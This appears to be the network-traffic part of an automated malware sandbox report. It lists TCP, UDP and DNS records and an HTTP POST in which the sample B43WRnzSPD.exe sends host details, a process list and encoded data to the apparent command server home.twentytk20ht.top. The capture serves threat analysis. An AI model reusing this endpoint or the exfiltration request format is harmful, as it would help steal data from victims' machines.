                                                Dec 23, 2024 17:15:31.253869057 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.253880024 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.253981113 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.254014969 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.254159927 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.254251003 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.254388094 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.254400015 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.254451036 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.254489899 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.254499912 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.254517078 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.254548073 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.254554987 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.254578114 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.254597902 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.254615068 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.254616976 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.254667997 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.254688978 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.254728079 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.375174046 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375227928 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375282049 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.375282049 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.375307083 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375325918 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375334978 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375339031 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375341892 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375345945 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375349998 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375358105 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375361919 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375372887 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375380039 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.375381947 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375406027 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.494884968 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.494935989 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.494966030 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.494997025 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495023966 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495052099 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495079041 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495105982 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495132923 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495160103 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495187998 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495213985 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495240927 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495254993 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.495266914 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495295048 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495342970 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495348930 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.495371103 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495398045 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495424986 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495451927 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495479107 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495506048 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495532990 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495558977 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495593071 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495625973 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495654106 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495681047 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495707989 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495733976 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495760918 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495786905 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495814085 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495840073 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495866060 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495892048 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495918989 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495944977 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495970964 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495999098 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.496026039 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.496052980 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.496079922 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.496107101 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.496133089 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.496160030 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.496186972 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.496334076 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.616277933 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.616295099 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.616317987 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.616327047 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.616337061 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.616345882 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.616355896 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.616729975 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.616815090 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.618370056 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.618391991 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.618540049 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.618550062 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.618597031 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.618607998 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.618688107 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.618697882 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.618747950 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.618757010 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.618861914 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.618870974 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619074106 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619144917 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619246006 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619255066 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619380951 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619390011 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619472980 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619539976 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619579077 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619645119 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619708061 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619716883 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619826078 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619836092 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619853973 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619862080 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619942904 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619962931 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620023012 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620031118 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620083094 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620091915 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620228052 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620284081 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620341063 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620362997 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620419025 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620429039 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620510101 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620520115 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620600939 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620609045 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620734930 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620744944 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620801926 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620811939 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620851994 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620862007 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620901108 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620910883 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.621015072 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.621026039 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.621278048 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.737015963 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737164974 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737281084 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737309933 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737481117 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737524033 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737575054 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737601995 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737649918 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737678051 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737756014 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737785101 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737812042 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737838030 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737884998 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737915039 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737941980 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737976074 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738003016 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738029957 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738101959 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738130093 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738183022 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738209963 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738280058 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738306999 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738359928 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738410950 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738477945 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738504887 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738554955 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738581896 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738660097 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738687038 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738734961 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738763094 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738905907 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738934994 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738967896 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738997936 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739106894 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739134073 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739217043 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739305973 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739408970 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739514112 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739804983 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739833117 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739887953 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739916086 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739965916 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739994049 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.740020990 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.740052938 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741149902 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741266012 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741405010 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741439104 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741466045 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741533041 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741560936 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741610050 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741637945 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741697073 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741749048 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741841078 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741897106 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741945982 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741972923 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742022038 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742048979 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742098093 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742125988 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742153883 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742208004 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742235899 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742278099 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742309093 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742374897 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742403030 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742429972 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742480993 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742506981 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742533922 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742561102 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742589951 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742621899 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742790937 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742820024 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742923975 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742953062 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.743025064 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.743052959 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.743156910 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.743185043 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:16:02.379251003 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:16:02.379364014 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:16:02.379443884 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:16:02.379940987 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:16:02.499485016 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:16:03.136086941 CET4971280192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:16:03.255723000 CET8049712185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:16:03.255897999 CET4971280192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:16:03.256463051 CET4971280192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:16:03.375999928 CET8049712185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:16:12.926074028 CET8049712185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:16:12.926196098 CET8049712185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:16:12.926284075 CET4971280192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:16:12.926645041 CET4971280192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:16:13.046423912 CET8049712185.121.15.192192.168.2.8

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 23, 2024 17:15:25.681941032 CET6005153192.168.2.81.1.1.1
                                                Dec 23, 2024 17:15:25.682001114 CET6005153192.168.2.81.1.1.1
                                                Dec 23, 2024 17:15:25.820022106 CET53600511.1.1.1192.168.2.8
                                                Dec 23, 2024 17:15:25.991029024 CET53600511.1.1.1192.168.2.8
                                                Dec 23, 2024 17:15:29.486104965 CET6005453192.168.2.81.1.1.1
                                                Dec 23, 2024 17:15:29.486166000 CET6005453192.168.2.81.1.1.1
                                                Dec 23, 2024 17:15:30.026251078 CET53600541.1.1.1192.168.2.8
                                                Dec 23, 2024 17:15:30.026447058 CET53600541.1.1.1192.168.2.8
                                                Dec 23, 2024 17:16:02.996191025 CET5518553192.168.2.81.1.1.1
                                                Dec 23, 2024 17:16:02.996268988 CET5518553192.168.2.81.1.1.1
                                                Dec 23, 2024 17:16:03.134632111 CET53551851.1.1.1192.168.2.8
                                                Dec 23, 2024 17:16:03.134677887 CET53551851.1.1.1192.168.2.8

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Dec 23, 2024 17:15:25.681941032 CET192.168.2.81.1.1.10xaa46Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                Dec 23, 2024 17:15:25.682001114 CET192.168.2.81.1.1.10xa54eStandard query (0)httpbin.org28IN (0x0001)false
                                                Dec 23, 2024 17:15:29.486104965 CET192.168.2.81.1.1.10xb507Standard query (0)home.twentytk20ht.topA (IP address)IN (0x0001)false
                                                Dec 23, 2024 17:15:29.486166000 CET192.168.2.81.1.1.10x840eStandard query (0)home.twentytk20ht.top28IN (0x0001)false
                                                Dec 23, 2024 17:16:02.996191025 CET192.168.2.81.1.1.10x2f92Standard query (0)home.twentytk20ht.topA (IP address)IN (0x0001)false
                                                Dec 23, 2024 17:16:02.996268988 CET192.168.2.81.1.1.10x7948Standard query (0)home.twentytk20ht.top28IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Dec 23, 2024 17:15:25.991029024 CET1.1.1.1192.168.2.80xaa46No error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                Dec 23, 2024 17:15:25.991029024 CET1.1.1.1192.168.2.80xaa46No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                Dec 23, 2024 17:15:30.026251078 CET1.1.1.1192.168.2.80xb507No error (0)home.twentytk20ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                Dec 23, 2024 17:16:03.134632111 CET1.1.1.1192.168.2.80x2f92No error (0)home.twentytk20ht.top185.121.15.192A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • httpbin.org
                                                • home.twentytk20ht.top

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.849706185.121.15.192802664C:\Users\user\Desktop\B43WRnzSPD.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 23, 2024 17:15:30.153435946 CET12360OUTPOST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1
                                                Host: home.twentytk20ht.top
                                                Accept: */*
                                                Content-Type: application/json
                                                Content-Length: 442861
                                                Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 39 37 30 35 32 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                Data Ascii: { "ip": "8.46.123.189", "current_time": "1734970528", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 744 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 372 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                Dec 23, 2024 17:15:30.273255110 CET9888OUTData Raw: 62 70 31 71 61 78 64 4c 67 65 65 46 6e 79 54 56 6e 4b 6e 56 6c 42 70 71 55 5a 4f 4d 6b 33 5c 2f 58 64 44 36 42 5c 2f 30 72 73 54 54 6f 56 61 50 68 56 4b 63 4d 54 51 70 59 6d 69 6e 78 74 34 63 77 71 54 6f 31 34 52 6e 53 6e 37 47 66 46 38 61 30 65
                                                Data Ascii: bp1qaxdLgeeFnyTVnKnVlBpqUZOMk3\/XdD6B\/0rsTToVaPhVKcMTQpYminxt4cwqTo14RnSn7GfF8a0eeMk+WcIyV7Simmj8hKK\/X63\/4JOeILgkf8Ls0VCDgg+CL4kMP4T\/xUowcYPODyK\/MH4l+Cbn4a\/EPxt8Pru\/g1S58F+KNb8MzalbRSQQX76PqE9ibyKCVnkgS48kSiF3kMW7y\/Mk272\/RfB76U3gL4+5t
                                                Dec 23, 2024 17:15:30.273343086 CET4944OUTData Raw: 51 48 6c 70 5c 2f 47 6b 61 66 38 41 4c 58 75 4a 2b 6c 55 32 58 35 76 39 6a 5c 2f 70 70 2b 34 74 5c 2f 2b 33 54 74 31 5c 2f 38 41 72 31 63 32 5c 2f 75 5c 2f 6e 5c 2f 4f 54 2b 66 35 5c 2f 79 78 31 46 51 37 59 5c 2f 6e 5c 2f 6a 38 76 39 37 33 4e 42
